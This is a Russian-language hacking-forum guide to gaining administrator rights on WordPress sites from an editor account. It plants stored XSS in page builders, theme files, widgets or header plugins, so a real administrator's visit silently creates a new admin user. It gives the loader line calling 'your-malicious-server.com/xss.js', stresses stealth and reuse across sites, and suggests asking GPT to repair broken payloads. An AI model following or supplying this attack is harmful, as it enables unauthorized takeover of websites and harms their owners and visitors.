XSS Administrator Escalation (WP) | Повышение прав к админу | Получаем доступ без ограничений

XSS & Social Engineering​

Пролог:

Если вы имеете доступ к сайту WordPress как редактор или другой пользователь с ограниченными правами, вы можете использовать кастомный HTML или JS для повышения своих привилегий до уровня администратора. Этот процесс не требует глубоких технических знаний: достаточно вставить вредоносный JavaScript-код в доступные для редактирования области сайта. В этом гайде мы подробно рассмотрим, как это работает, куда вставлять скрипты и что учитывать.

​

Как это работает:

Все просто: скрипт на JavaScript отправляет запрос на создание нового пользователя с правами администратора. Код выполняется автоматически, когда администратор заходит на страницу, где размещен скрипт.
Результат — у вас появляется доступ к панели управления как у полноценного администратора.

​

Почему это работает в большинстве случаев?

Примерно 60% сайтов используют современные блочные редакторы, такие как Elementor, WPBakery, Gutenberg или UX Builder. Все они предоставляют возможность добавлять HTML и JS напрямую, но ограничивают функции только для определенных ролей. Однако администраторы часто позволяют редакторам работать с кастомным HTML для упрощения работы, что открывает уязвимость.

Основные причины успеха:

1. Доступ к кастомному HTML — по умолчанию включен на многих сайтах.

2. Слабый контроль безопасности — не все администраторы понимают, что редакторы могут вставить JavaScript.

2. Удобство блочных редакторов — простота интерфейса, позволяющая вставить скрипт с помощью Ctrl+C → Ctrl+V.

На сайтах, где блочные редакторы запрещают кастомный HTML, часто можно найти другие пути для инъекций, такие как редактирование тем, виджетов или установка плагинов.



Куда вставить скрипт?

1. Блочные редакторы

• Elementor - Просто добавьте виджет HTML и вставьте скрипт. Код выполнится как есть.
• Gutenberg - Используйте блок "HTML". Код будет работать, даже если редактор оборачивает его в комментарии (<!-- wp:html -->).
• WPBakery - Модуль Raw HTML идеально подходит для таких задач. Скрипт исполняется без изменений.
• UX Builder - Вставьте JavaScript в текстовый или HTML-блок — обертки почти отсутствуют, код запускается напрямую.

2. Редактор тем WordPress
Перейдите в Внешний вид → Редактор тем.
Выберите файл, который загружается на каждой странице, например, footer.php или header.php.
Вставьте скрипт перед закрывающим тегом </body>.

3. Виджеты
Добавьте Текстовый виджет в подвал или боковую колонку.
Вставьте ваш скрипт прямо в него.

4. Вставка через плагины
Используйте плагины, такие как "Insert Headers and Footers", чтобы добавить скрипт в заголовок или подвал сайта.



Как вставить скрипт?

<script src="http://your-malicious-server.com/xss.js"></script>

JS

<script src="http://your-malicious-server.com/xss.js"></script>

Зачем использовать script src?

1. Удобство модернизации — если вы хотите изменить функционал скрипта, достаточно обновить файл на вашем сервере.
2. Скрытность — такой способ выглядит более естественно, чем вставка громоздкого JavaScript-кода напрямую.
3. Повторное использование — один и тот же скрипт можно подключать к разным сайтам.



Важные замечания

1. Хостинг для скрипта
Подойдет любой доступный хостинг, даже бесплатный WordPress или малозаметный сайт с рабочим доменом. Главное — убедитесь, что хостинг позволяет загружать JavaScript-файлы.

2. Роли блочных редакторов
Если ваш скрипт "не срабатывает", возможно, редактор блокирует выполнение кода. В этом случае уточните, как редактор обрабатывает вставки HTML. Пример обертки из Gutenberg:

<!-- wp:html -->

<script src="http://your-malicious-server.com/xss.js"></script>

<!-- /wp:html -->

HTML

<!-- wp:html -->



<script src="http://your-malicious-server.com/xss.js"></script>



<!-- /wp:html -->

3. Не работает? Обратитесь в GPT!
Если редактор добавляет лишние символы, теги или изменяет ваш код, попросите у GPT помощь, указав пример вставки. Это решит большинство технических вопросов.


Если же вы сами не имеете желаения обрабатывать доступа wp, обратите внимание на данную тему - - - https://zelenka.guru/threads/7899042/ - - -


текст by chat gpt (Полернул текст чатом, думаю вам так приятнее читать)

Любые вопросы по поводу данной статьи, помощь, и.т.д обращаться в комментарии(Если что-то с уточнением под хайд. плс.)